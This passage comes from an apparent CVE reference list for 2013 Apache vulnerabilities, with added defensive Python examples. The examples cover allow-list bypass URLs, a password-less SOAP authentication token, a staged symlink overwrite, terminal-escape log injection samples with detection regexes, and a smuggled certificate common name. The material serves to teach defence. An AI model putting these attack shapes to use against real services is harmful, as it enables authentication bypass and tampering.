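        else:
            alternatives.append(re.escape(name))
    pattern = "^(?:" + "|".join(alternatives) + ")"
    if anchored:
        pattern += "$"
    return re.compile(pattern)


def host_allowed(whitelist, url: str) -> bool:
    """Match the parsed host, never the raw URL string: parsing first also
    defeats 'https://example.com@attacker.net/' (userinfo trick) and
    'https://attacker.net/example.com' (allowed name in the path)."""
    host = urlsplit(url).hostname or ""
    return whitelist.match(host) is not None


if __name__ == "__main__":
    allowed = ["example.com", "*.trusted.org"]
    strict = compile_whitelist(allowed)
    loose = compile_whitelist(allowed, anchored=False)
    for url in ("https://example.com/app",
                "https://example.com.attacker.net/",
                "https://api.trusted.org.attacker.net/",
                "https://example.com@attacker.net/"):
        print(f"{url:45} strict={host_allowed(strict, url)} loose={host_allowed(loose, url)}")
```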
CVE-2013-0177 LOW

Multiple cross-site scripting (XSS) vulnerabilities in widget/screen/ModelScreenWidget.java in Apache Open For Business Project (aka OFBiz) 10.04.x before 10.04.05, 11.04.01, and possibly 09.04.x allow remote authenticated users to inject arbitrary web script or HTML via the (1) Screenlet.title or (2) Image.alt Widget attribute, as demonstrated by the parentPortalPageId parameter to exampleext/control/ManagePortalPages.

CVSS 2.0

Severity: LOW

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache ofbiz 10.04.01
apache ofbiz 09.04.01
apache ofbiz 10.04.03
apache ofbiz 11.04.01
apache ofbiz 10.04.04
apache ofbiz 10.04
apache ofbiz 09.04
apache ofbiz 10.04.02
CVE-2013-0239 MEDIUM

Apache CXF before 2.5.9, 2.6.x before 2.6.6, and 2.7.x before 2.7.3, when the plaintext UsernameToken WS-SecurityPolicy is enabled, allows remote attackers to bypass authentication via a security header of a SOAP request containing a UsernameToken element that lacks a password child element.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache cxf 2.7.0
apache cxf 2.4.4
apache cxf 2.6.3
apache cxf 2.6.0
apache cxf 2.4.0
apache cxf 2.5.2
apache cxf 2.4.6
apache cxf 2.7.2
apache cxf 2.4.5
apache cxf 2.6.4
apache cxf 2.5.0
apache cxf 2.5.5
apache cxf 2.5.6
apache cxf 2.6.5
apache cxf 2.5.3
apache cxf 2.4.7
apache cxf 2.6.1
apache cxf 2.4.1
apache cxf 2.4.3
apache cxf 2.7.1
apache cxf *
apache cxf 2.5.1
apache cxf 2.5.4
apache cxf 2.6.2
apache cxf 2.5.7
apache cxf 2.4.2
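The CXF entry above is an authentication check that verified the presence of a UsernameToken but not the presence of the credential inside it. As an added example (not CXF's or WSS4J's code), the validator below treats a token without a Password element as a hard failure and, for completeness, handles both the PasswordText and PasswordDigest forms defined by the WS-Security UsernameToken Profile 1.0. The user store and the sample headers produced by make_token are constructed for the example.

```python
import base64
import hashlib
import hmac
import xml.etree.ElementTree as ET

WSSE = ("http://docs.oasis-open.org/wss/2004/01/"
        "oasis-200401-wss-wssecurity-secext-1.0.xsd")
WSU = ("http://docs.oasis-open.org/wss/2004/01/"
       "oasis-200401-wss-wssecurity-utility-1.0.xsd")
PROFILE = ("http://docs.oasis-open.org/wss/2004/01/"
           "oasis-200401-wss-username-token-profile-1.0")
PASSWORD_TEXT = PROFILE + "#PasswordText"
PASSWORD_DIGEST = PROFILE + "#PasswordDigest"


def password_digest(nonce_b64: str, created: str, password: str) -> str:
    """UsernameToken Profile 1.0: Base64(SHA-1(nonce || created || password))."""
    raw = base64.b64decode(nonce_b64) + created.encode() + password.encode()
    return base64.b64encode(hashlib.sha1(raw).digest()).decode()


def validate_username_token(security_xml: str, users: dict) -> bool:
    """True only for a token that names a known user AND proves the password.
    A token carrying a Username but no Password element is rejected outright;
    accepting it is the failure mode CVE-2013-0239 describes."""
    root = ET.fromstring(security_xml)
    token = root.find(f".//{{{WSSE}}}UsernameToken")
    if token is None:
        return False
    username = token.findtext(f"{{{WSSE}}}Username")
    pw = token.find(f"{{{WSSE}}}Password")
    if not username or pw is None or not pw.text:
        return False
    expected = users.get(username)
    if expected is None:
        return False
    ptype = pw.get("Type", PASSWORD_TEXT)   # profile default is PasswordText
    if ptype == PASSWORD_TEXT:
        return hmac.compare_digest(pw.text.encode(), expected.encode())
    if ptype == PASSWORD_DIGEST:
        nonce = token.findtext(f"{{{WSSE}}}Nonce")
        created = token.findtext(f"{{{WSU}}}Created")
        if not nonce or not created:
            return False
        want = password_digest(nonce, created, expected)
        return hmac.compare_digest(pw.text.encode(), want.encode())
    return False  # unknown password type: fail closed


def make_token(username, password=None, digest=False,
               nonce=b"\x00\x01\x02\x03\x04\x05\x06\x07",
               created="2013-02-01T12:00:00Z") -> str:
    """Constructed sample Security headers. password=None yields the attack
    shape: a UsernameToken carrying only a Username."""
    nonce_b64 = base64.b64encode(nonce).decode()
    body = f"<wsse:Username>{username}</wsse:Username>"
    if password is not None and digest:
        body += (f'<wsse:Password Type="{PASSWORD_DIGEST}">'
                 f"{password_digest(nonce_b64, created, password)}</wsse:Password>"
                 f"<wsse:Nonce>{nonce_b64}</wsse:Nonce>"
                 f"<wsu:Created>{created}</wsu:Created>")
    elif password is not None:
        body += f'<wsse:Password Type="{PASSWORD_TEXT}">{password}</wsse:Password>'
    return (f'<wsse:Security xmlns:wsse="{WSSE}" xmlns:wsu="{WSU}">'
            f"<wsse:UsernameToken>{body}</wsse:UsernameToken></wsse:Security>")


if __name__ == "__main__":
    users = {"alice": "s3cret"}
    print("text password:", validate_username_token(make_token("alice", "s3cret"), users))
    print("digest password:", validate_username_token(make_token("alice", "s3cret", digest=True), users))
    print("no password element:", validate_username_token(make_token("alice"), users))
```

A real deployment would additionally reject Created timestamps outside a short window and cache nonces to stop digest replay; those checks are omitted here to keep the point on the missing Password element.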
CVE-2013-0248 LOW

The default configuration of javax.servlet.context.tempdir in Apache Commons FileUpload 1.0 through 1.2.2 uses the /tmp directory for uploaded files, which allows local users to overwrite arbitrary files via an unspecified symlink attack.

CVSS 2.0

Severity: LOW

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache commons_fileupload 1.1.1
apache commons_fileupload 1.1
apache commons_fileupload 1.0
apache commons_fileupload 1.2.2
apache commons_fileupload 1.2.1
apache commons_fileupload 1.2
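The FileUpload entry above is the classic shared-/tmp symlink problem: a predictable file name in a world-writable directory lets another local user pre-create a symlink so the service's write lands on a file of the attacker's choosing. The added example below (not Commons FileUpload's code) stages that attack in a scratch directory and contrasts it with a private upload directory and exclusive-create opens. All paths and contents are constructed for the demonstration; it assumes a POSIX filesystem where symlinks can be created.

```python
import os
import stat
import tempfile


def naive_save(path: str, data: bytes) -> None:
    """The weak pattern: a predictable name in a shared temp directory opened
    with plain open(). If another local user already planted a symlink at that
    name, the write lands wherever the link points."""
    with open(path, "wb") as f:
        f.write(data)


def make_private_upload_dir() -> str:
    """A per-service directory created mode 0700, so other local users can
    neither read uploads nor plant entries in it."""
    return tempfile.mkdtemp(prefix="uploads_")


def safe_save(upload_dir: str, data: bytes) -> str:
    """Unpredictable name plus O_CREAT|O_EXCL (what mkstemp does), so an
    existing entry, symlink or not, makes the open fail instead of being
    followed. Returns the path written."""
    fd, path = tempfile.mkstemp(prefix="upload_", dir=upload_dir)
    with os.fdopen(fd, "wb") as f:
        f.write(data)
    return path


def demo_symlink_attack():
    """Stage the attack in a scratch directory and report three facts:
    (naive write followed the planted link, exclusive create refused it,
    the safe file and directory modes exclude other users)."""
    scratch = tempfile.mkdtemp(prefix="demo_")
    victim = os.path.join(scratch, "victim.conf")
    with open(victim, "wb") as f:
        f.write(b"original contents")
    predictable = os.path.join(scratch, "upload_00000001.tmp")
    os.symlink(victim, predictable)             # attacker moves first

    naive_save(predictable, b"attacker data")
    with open(victim, "rb") as f:
        naive_followed_link = f.read() == b"attacker data"

    try:
        fd = os.open(predictable, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
        os.close(fd)
        exclusive_refused = False
    except FileExistsError:
        exclusive_refused = True

    upload_dir = make_private_upload_dir()
    written = safe_save(upload_dir, b"payload")
    file_mode = stat.S_IMODE(os.stat(written).st_mode)
    dir_mode = stat.S_IMODE(os.stat(upload_dir).st_mode)
    modes_private = (file_mode & 0o077) == 0 and (dir_mode & 0o077) == 0
    return naive_followed_link, exclusive_refused, modes_private


if __name__ == "__main__":
    print(demo_symlink_attack())
```

The two defences are independent: the private directory removes the attacker's ability to plant anything, and O_EXCL makes the write fail safely even if the directory is ever shared.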
CVE-2013-0253 MEDIUM

The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-16,

Products Affected

Vendor Product Version
apache maven 3.0.4
CVE-2013-0267 MEDIUM

The Privileges portion of the web GUI and the XMLRPC API in Apache VCL 2.3.x before 2.3.2, 2.2.x before 2.2.2 and 2.1 allow remote authenticated users with nodeAdmin, manageGroup, resourceGrant, or userGrant permissions to gain privileges, cause a denial of service, or conduct cross-site scripting (XSS) attacks by leveraging improper data validation.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,CWE-264,

Products Affected

Vendor Product Version
apache vcl 2.1
apache vcl *
CVE-2013-0346 LOW

Apache Tomcat 7.x uses world-readable permissions for the log directory and its files, which might allow local users to obtain sensitive information by reading a file. NOTE: One Tomcat distributor has stated "The tomcat log directory does not contain any sensitive information."

CVSS 2.0

Severity: LOW

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache tomcat 7.0.47
apache tomcat 7.0.13
apache tomcat 7.0.39
apache tomcat 7.0.44
apache tomcat 7.0.12
apache tomcat 7.0.41
apache tomcat 7.0.50
apache tomcat 7.0.28
apache tomcat 7.0.21
apache tomcat 7.0.33
apache tomcat 7.0.31
apache tomcat 7.0.3
apache tomcat 7.0.40
apache tomcat 7.0.17
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 7.0.5
apache tomcat 7.0.0
apache tomcat 7.0.32
apache tomcat 7.0.4
apache tomcat 7.0.25
apache tomcat 7.0.36
apache tomcat 7.0.38
apache tomcat 7.0.15
apache tomcat 7.0.37
apache tomcat 7.0.48
apache tomcat 7.0.42
apache tomcat 7.0.35
apache tomcat 7.0.23
apache tomcat 7.0.9
apache tomcat 7.0.19
apache tomcat 7.0.43
apache tomcat 7.0.18
apache tomcat 7.0.46
apache tomcat 7.0.7
apache tomcat 7.0.29
apache tomcat 7.0.34
apache tomcat 7.0.24
apache tomcat 7.0.20
apache tomcat 7.0.14
apache tomcat 7.0.49
apache tomcat 7.0.1
apache tomcat 7.0.45
apache tomcat 7.0.10
apache tomcat 7.0.6
apache tomcat 7.0.26
apache tomcat 7.0.8
apache tomcat 7.0.27
apache tomcat 7.0.2
apache tomcat 7.0.22
apache tomcat 7.0.30
CVE-2013-1768 HIGH

The BrokerFactory functionality in Apache OpenJPA 1.x before 1.2.3 and 2.x before 2.2.2 creates local executable JSP files containing logging trace data produced during deserialization of certain crafted OpenJPA objects, which makes it easier for remote attackers to execute arbitrary code by creating a serialized object and leveraging improperly secured server programs.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache openjpa 1.0.4
apache openjpa 1.2.1
apache openjpa 2.2.1
apache openjpa 2.1.0
apache openjpa 1.0.0
apache openjpa 2.2.0
apache openjpa 1.2.0
apache openjpa 1.0.3
apache openjpa 1.0.1
apache openjpa 2.0.1
apache openjpa 1.1.0
apache openjpa 2.0.0
apache openjpa 1.0.2
apache openjpa 2.1.1
apache openjpa 1.2.2
CVE-2013-1777 HIGH

The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as used in IBM WebSphere Application Server (WAS) Community Edition 3.0.0.3 and other products, does not properly implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-94,

Products Affected

Vendor Product Version
apache geronimo 3.0
ibm websphere_application_server 3.0.0.3
CVE-2013-1814 MEDIUM

The users/get program in the User RPC API in Apache Rave 0.11 through 0.20 allows remote authenticated users to obtain sensitive information about all user accounts via the offset parameter, as demonstrated by discovering password hashes in the password field of a response.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache rave 0.16
apache rave 0.19
apache rave 0.17
apache rave 0.12
apache rave 0.20
apache rave 0.14
apache rave 0.13
apache rave 0.15
apache rave 0.11
apache rave 0.18
CVE-2013-1845 LOW

The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x before 1.6.21 and 1.7.0 through 1.7.8 allows remote authenticated users to cause a denial of service (memory consumption) by (1) setting or (2) deleting a large number of properties for a file or directory.

CVSS 2.0

Severity: LOW

Problem Type: CWE-119,

Products Affected

Vendor Product Version
apache subversion 1.7.3
apache subversion 1.6.18
opensuse opensuse 12.1
apache subversion 1.6.0
apache subversion 1.6.16
apache subversion 1.7.8
apache subversion 1.6.6
apache subversion 1.6.11
apache subversion 1.6.4
apache subversion 1.6.8
apache subversion 1.6.2
apache subversion 1.6.9
apache subversion 1.7.6
apache subversion 1.6.19
apache subversion 1.7.4
apache subversion 1.6.17
apache subversion 1.7.1
apache subversion 1.6.7
apache subversion 1.6.10
apache subversion 1.6.20
apache subversion 1.7.5
apache subversion 1.6.12
opensuse opensuse 12.3
apache subversion 1.6.1
apache subversion 1.6.13
apache subversion 1.6.3
apache subversion 1.7.0
apache subversion 1.7.2
apache subversion 1.6.5
opensuse opensuse 12.2
apache subversion 1.6.15
apache subversion 1.6.14
apache subversion 1.7.7
CVE-2013-1846 MEDIUM

The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x before 1.6.21 and 1.7.0 through 1.7.8 allows remote authenticated users to cause a denial of service (NULL pointer dereference and crash) via a LOCK on an activity URL.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-119,

Products Affected

Vendor Product Version
apache subversion 1.7.3
apache subversion 1.6.18
opensuse opensuse 12.1
apache subversion 1.6.0
apache subversion 1.6.16
apache subversion 1.6.6
apache subversion 1.6.11
apache subversion 1.6.4
apache subversion 1.6.8
apache subversion 1.6.2
apache subversion 1.6.9
apache subversion 1.7.6
apache subversion 1.6.19
apache subversion 1.7.4
apache subversion 1.6.17
apache subversion 1.7.1
apache subversion *
apache subversion 1.6.7
apache subversion 1.6.10
apache subversion 1.7.5
apache subversion 1.6.12
opensuse opensuse 12.3
apache subversion 1.6.1
apache subversion 1.6.13
apache subversion 1.6.3
apache subversion 1.7.0
apache subversion 1.7.2
apache subversion 1.6.5
opensuse opensuse 12.2
apache subversion 1.6.15
apache subversion 1.6.14
apache subversion 1.7.7
CVE-2013-1847 MEDIUM

The mod_dav_svn Apache HTTPD server module in Subversion 1.6.0 through 1.6.20 and 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via an anonymous LOCK for a URL that does not exist.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache subversion 1.7.3
apache subversion 1.6.18
apache subversion 1.6.0
apache subversion 1.6.16
apache subversion 1.7.8
apache subversion 1.6.6
apache subversion 1.6.11
apache subversion 1.6.4
apache subversion 1.6.8
apache subversion 1.6.2
apache subversion 1.6.9
apache subversion 1.7.6
apache subversion 1.6.19
apache subversion 1.7.4
apache subversion 1.6.17
apache subversion 1.7.1
apache subversion 1.6.7
apache subversion 1.6.10
apache subversion 1.6.20
apache subversion 1.7.5
apache subversion 1.6.12
apache subversion 1.6.1
apache subversion 1.6.13
apache subversion 1.6.3
apache subversion 1.7.0
apache subversion 1.7.2
apache subversion 1.6.5
apache subversion 1.6.15
apache subversion 1.6.14
apache subversion 1.7.7
CVE-2013-1849 MEDIUM

The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x through 1.6.20 and 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via a PROPFIND request for an activity URL.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache subversion 1.7.3
apache subversion 1.6.18
apache subversion 1.6.0
apache subversion 1.6.16
apache subversion 1.7.8
apache subversion 1.6.6
apache subversion 1.6.11
apache subversion 1.6.4
apache subversion 1.6.8
apache subversion 1.6.2
apache subversion 1.6.9
apache subversion 1.7.6
apache subversion 1.6.19
apache subversion 1.7.4
apache subversion 1.6.17
apache subversion 1.7.1
apache subversion 1.6.7
apache subversion 1.6.10
apache subversion 1.6.20
apache subversion 1.7.5
apache subversion 1.6.12
apache subversion 1.6.1
apache subversion 1.6.13
apache subversion 1.6.3
apache subversion 1.7.0
apache subversion 1.7.2
apache subversion 1.6.5
apache subversion 1.6.15
apache subversion 1.6.14
apache subversion 1.7.7
CVE-2013-1862 MEDIUM

mod_rewrite.c in the mod_rewrite module in the Apache HTTP Server 2.2.x before 2.2.25 writes data to a log file without sanitizing non-printable characters, which might allow remote attackers to execute arbitrary commands via an HTTP request containing an escape sequence for a terminal emulator.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache http_server *
redhat jboss_enterprise_application_platform 6.0.0
redhat enterprise_linux_server_aus 6.4
oracle http_server 11.1.1.7.0
redhat enterprise_linux_eus 6.4
oracle http_server 12.1.3.0
canonical ubuntu_linux 12.04
opensuse opensuse 11.4
redhat enterprise_linux_server 6.0
redhat jboss_enterprise_application_platform 6.4.0
canonical ubuntu_linux 12.10
canonical ubuntu_linux 13.04
oracle http_server 12.1.2.0
redhat enterprise_linux_eus 5.9
redhat enterprise_linux_desktop 5.0
canonical ubuntu_linux 10.04
redhat enterprise_linux_server_aus 5.9
redhat enterprise_linux_desktop 6.0
opensuse opensuse 12.3
redhat enterprise_linux_workstation 5.0
redhat enterprise_linux_workstation 6.0
redhat enterprise_linux_server 5.0
opensuse opensuse 12.2
oracle http_server 10.1.3.5.0
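The mod_rewrite entry above is about what a log file does to the terminal of whoever reads it: raw bytes from the request end up in the log, and an ESC sequence in them is interpreted by the emulator when an administrator runs cat or tail. The following added example (not httpd's code) shows the two sides a practitioner wants: a sanitizer that escapes non-printable bytes in the \xNN style httpd's own log escaping uses, and a detector run over sample log lines. The log lines are constructed for the example.

```python
import re

# Any C0 control byte or DEL. Tab is deliberately not exempted: a log field
# derived from a request should never carry one raw either.
CONTROL_BYTES = re.compile(rb"[\x00-\x1f\x7f]")
# ESC followed by a CSI sequence (ESC [ ... final), an OSC string terminated
# by BEL, or any single Fe escape (ESC @ .. ESC _).
ESC_SEQUENCE = re.compile(rb"\x1b(?:\[[0-?]*[ -/]*[@-~]|\][^\x07]*\x07|[@-_])")


def sanitize_for_log(value: str) -> str:
    """Render a request-derived string so it is safe to append to a log read
    with cat/tail/less: printable ASCII passes through, a backslash is doubled
    so the output stays unambiguous, every other byte becomes \\xNN."""
    out = []
    for b in value.encode("utf-8", "surrogateescape"):
        if 0x20 <= b <= 0x7e and b != 0x5c:
            out.append(chr(b))
        elif b == 0x5c:
            out.append("\\\\")
        else:
            out.append(f"\\x{b:02x}")
    return "".join(out)


def find_terminal_injection(lines):
    """Detection over already-written log lines: returns (line number, reason)
    for every line carrying an escape sequence or any other control byte."""
    hits = []
    for n, line in enumerate(lines, 1):
        raw = line.encode("utf-8", "surrogateescape")
        if ESC_SEQUENCE.search(raw):
            hits.append((n, "terminal escape sequence"))
        elif CONTROL_BYTES.search(raw):
            hits.append((n, "control byte"))
    return hits


# Constructed access-log lines: one clean, one with a clear-screen plus colour
# change, one with a NUL byte in the path.
SAMPLE_LINES = [
    '203.0.113.5 - - [01/Jul/2013:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jul/2013:10:00:01 +0000] "GET /\x1b[2J\x1b[1;31mpwned HTTP/1.1" 404 0',
    '203.0.113.9 - - [01/Jul/2013:10:00:02 +0000] "GET /\x00 HTTP/1.1" 400 0',
]

if __name__ == "__main__":
    for n, reason in find_terminal_injection(SAMPLE_LINES):
        print(f"line {n}: {reason}: {sanitize_for_log(SAMPLE_LINES[n - 1])}")
```

The sanitizer belongs at the point of writing; the detector is what you run over logs that were written by software you do not control.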
CVE-2013-1879 MEDIUM

Cross-site scripting (XSS) vulnerability in scheduled.jsp in Apache ActiveMQ 5.8.0 and earlier allows remote attackers to inject arbitrary web script or HTML via vectors involving the "cron of a message."

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache activemq 5.6.0
apache activemq *
apache activemq 5.3.1
apache activemq 5.4.2
apache activemq 5.5.0
apache activemq 5.4.0
apache activemq 5.1.0
apache activemq 5.3.2
apache activemq 5.3.0
apache activemq 5.0.0
apache activemq 5.5.1
apache activemq 5.7.0
apache activemq 5.2.0
apache activemq 5.4.1
CVE-2013-1880 MEDIUM

Cross-site scripting (XSS) vulnerability in the Portfolio publisher servlet in the demo web application in Apache ActiveMQ before 5.9.0 allows remote attackers to inject arbitrary web script or HTML via the refresh parameter to demo/portfolioPublish, a different vulnerability than CVE-2012-6092.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache activemq 5.6.0
apache activemq *
apache activemq 5.3.1
apache activemq 5.4.2
apache activemq 5.5.0
apache activemq 5.4.0
apache activemq 5.1.0
apache activemq 5.3.2
apache activemq 5.3.0
apache activemq 5.0.0
apache activemq 5.5.1
apache activemq 5.7.0
apache activemq 5.2.0
apache activemq 5.4.1
CVE-2013-1884 MEDIUM

The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (segmentation fault and crash) via a log REPORT request with an invalid limit, which triggers an access of an uninitialized variable.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-119,

Products Affected

Vendor Product Version
apache subversion 1.7.3
apache subversion 1.7.1
apache subversion 1.7.0
apache subversion 1.7.2
apache subversion 1.7.6
apache subversion 1.7.5
apache subversion 1.7.4
apache subversion 1.7.7
CVE-2013-1896 MEDIUM

mod_dav.c in the Apache HTTP Server before 2.2.25 does not properly determine whether DAV is enabled for a URI, which allows remote attackers to cause a denial of service (segmentation fault) via a MERGE request in which the URI is configured for handling by the mod_dav_svn module, but a certain href attribute in XML data refers to a non-DAV URI.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
redhat enterprise_linux_eus 5.9
apache http_server *
redhat enterprise_linux_desktop 5.0
redhat jboss_enterprise_application_platform 6.0.0
canonical ubuntu_linux 10.04
redhat enterprise_linux_server_aus 6.4
redhat enterprise_linux_server_aus 5.9
redhat enterprise_linux_eus 6.4
redhat enterprise_linux_desktop 6.0
canonical ubuntu_linux 12.04
opensuse opensuse 12.3
opensuse opensuse 11.4
redhat enterprise_linux_workstation 5.0
redhat enterprise_linux_server 6.0
redhat jboss_enterprise_application_platform 6.4.0
redhat enterprise_linux_workstation 6.0
canonical ubuntu_linux 12.10
redhat enterprise_linux_server 5.0
opensuse opensuse 12.2
canonical ubuntu_linux 13.04
CVE-2013-1909 MEDIUM

The Python client in Apache Qpid before 2.2 does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
redhat enterprise_mrg 2.0
apache qpid 0.10
apache qpid 0.17
apache qpid *
apache qpid 0.12
apache qpid 0.18
apache qpid 0.14
apache qpid 0.15
apache qpid 0.19
apache qpid 0.9
apache qpid 0.7
apache qpid 0.8
apache qpid 0.5
apache qpid 0.6
apache qpid 0.16
apache qpid 0.11
apache qpid 0.13
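Three entries in this section describe the same TLS client mistake from different angles: Axis2/C (CVE-2012-6107) and the Qpid Python client (CVE-2013-1909) skipped hostname verification entirely, and Commons HttpClient (CVE-2012-6153) did it by scanning the subject string for "CN=" so that a common name placed in another attribute was honoured. The following added example (not any of those projects' code) implements the check the way RFC 6125 expects, working on the dict shape Python's ssl module returns from getpeercert(), and includes the weak string-based extraction for contrast. All certificates in the test are constructed.

```python
import re


def _match_dns_name(pattern: str, hostname: str) -> bool:
    """RFC 6125-style comparison: case-insensitive, a wildcard only as the
    whole left-most label, never spanning a dot, and never as broad as
    '*.com'."""
    pattern = pattern.lower().rstrip(".")
    hostname = hostname.lower().rstrip(".")
    if "*" not in pattern:
        return pattern == hostname
    p_labels = pattern.split(".")
    h_labels = hostname.split(".")
    if p_labels[0] != "*" or len(p_labels) < 3 or len(p_labels) != len(h_labels):
        return False
    return p_labels[1:] == h_labels[1:]


def hostname_matches(cert: dict, hostname: str) -> bool:
    """cert uses the dict shape ssl.SSLSocket.getpeercert() returns:
       {'subject': ((('organizationName', 'Example'),), (('commonName', 'x'),)),
        'subjectAltName': (('DNS', 'x'), ('DNS', '*.y'))}
    When any DNS subjectAltName is present it is authoritative and the CN is
    ignored; the CN is consulted only for certificates with no DNS SAN."""
    sans = [v for k, v in cert.get("subjectAltName", ()) if k == "DNS"]
    if sans:
        return any(_match_dns_name(s, hostname) for s in sans)
    cns = [v for rdn in cert.get("subject", ()) for k, v in rdn
           if k == "commonName"]
    return any(_match_dns_name(cn, hostname) for cn in cns)


def naive_cn_from_dn_string(dn: str):
    """The weak approach: a regex over the flattened subject string. A value in
    some other attribute that itself contains 'CN=' is taken for the real
    common name, which is the class of mistake CVE-2012-6153 describes."""
    m = re.search(r"CN=([^,]+)", dn)
    return m.group(1).strip() if m else None


if __name__ == "__main__":
    smuggled = {"subject": ((("organizationName", "CN=api.example.com"),),
                            (("commonName", "attacker.example.net"),))}
    print("naive CN:", naive_cn_from_dn_string(
        "O=CN=api.example.com, CN=attacker.example.net"))
    print("structured match:", hostname_matches(smuggled, "api.example.com"))
```

Structured access to the subject (one attribute at a time, by type) rather than a regex over its string form is the whole difference between the two results printed above.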
CVE-2013-1965 HIGH

Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.3, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-94,

Products Affected

Vendor Product Version
apache struts *
apache struts2-showcase *
CVE-2013-1966 HIGH

Apache Struts 2 before 2.3.14.2 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-94,

Products Affected

Vendor Product Version
apache struts *
CVE-2013-1968 MEDIUM

Subversion before 1.6.23 and 1.7.x before 1.7.10 allows remote authenticated users to cause a denial of service (FSFS repository corruption) via a newline character in a file name.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache subversion 1.7.3
apache subversion 1.6.18
apache subversion 1.6.0
apache subversion 1.6.16
apache subversion 1.7.8
apache subversion 1.6.6
apache subversion 1.6.11
canonical ubuntu_linux 12.04
opensuse opensuse 11.4
apache subversion 1.6.4
apache subversion 1.6.8
apache subversion 1.6.2
apache subversion 1.6.9
apache subversion 1.7.6
apache subversion 1.6.19
canonical ubuntu_linux 12.10
apache subversion 1.7.9
canonical ubuntu_linux 13.04
apache subversion 1.7.4
apache subversion 1.6.17
apache subversion 1.7.1
apache subversion *
apache subversion 1.6.7
apache subversion 1.6.10
apache subversion 1.6.20
apache subversion 1.7.5
apache subversion 1.6.12
apache subversion 1.6.1
apache subversion 1.6.13
collabnet subversion 1.6.17
apache subversion 1.6.3
apache subversion 1.7.0
apache subversion 1.7.2
apache subversion 1.6.5
apache subversion 1.6.15
apache subversion 1.6.14
apache subversion 1.7.7
CVE-2013-2055 MEDIUM

Unspecified vulnerability in Apache Wicket 1.4.x before 1.4.23, 1.5.x before 1.5.11, and 6.x before 6.8.0 allows remote attackers to obtain sensitive information via vectors that cause raw HTML templates to be rendered without being processed, exposing the template content that lies outside the wicket:panel markup.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache wicket 6.8.0
apache wicket 1.4.20
apache wicket 1.4.15
apache wicket 1.4.16
apache wicket 6.2.0
apache wicket 1.4.12
apache wicket 1.4.22
apache wicket 1.5.9
apache wicket 6.1.1
apache wicket 6.4.0
apache wicket 1.4.0
apache wicket 1.5.4
apache wicket 1.4.14
apache wicket 1.4.1
apache wicket 1.4.13
apache wicket 1.4.11
apache wicket 1.5.1
apache wicket 1.5.8
apache wicket 1.4.10
apache wicket 1.4.18
apache wicket 1.5.2
apache wicket 1.5.5
apache wicket 6.7.0
apache wicket 6.1.0
apache wicket 6.5.0
apache wicket 6.3.0
apache wicket 6.6.0
apache wicket 1.4.21
apache wicket 1.5.3
apache wicket 1.5.6
apache wicket 1.5.7
apache wicket 1.5.10
apache wicket 1.4.17
apache wicket 1.5.0
apache wicket 1.4.19
CVE-2013-2067 MEDIUM

java/org/apache/catalina/authenticator/FormAuthenticator.java in the form authentication feature in Apache Tomcat 6.0.21 through 6.0.36 and 7.x before 7.0.33 does not properly handle the relationships between authentication requirements and sessions, which allows remote attackers to inject a request into a session by sending this request during completion of the login form, a variant of a session fixation attack.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache tomcat 7.0.4
apache tomcat 6.0.28
apache tomcat 7.0.25
apache tomcat 7.0.13
apache tomcat 6.0.33
apache tomcat 7.0.15
apache tomcat 7.0.23
apache tomcat 7.0.9
apache tomcat 7.0.19
apache tomcat 7.0.18
apache tomcat 7.0.7
apache tomcat 6.0.27
apache tomcat 7.0.12
apache tomcat 6.0.26
apache tomcat 6.0.29
apache tomcat 6.0.31
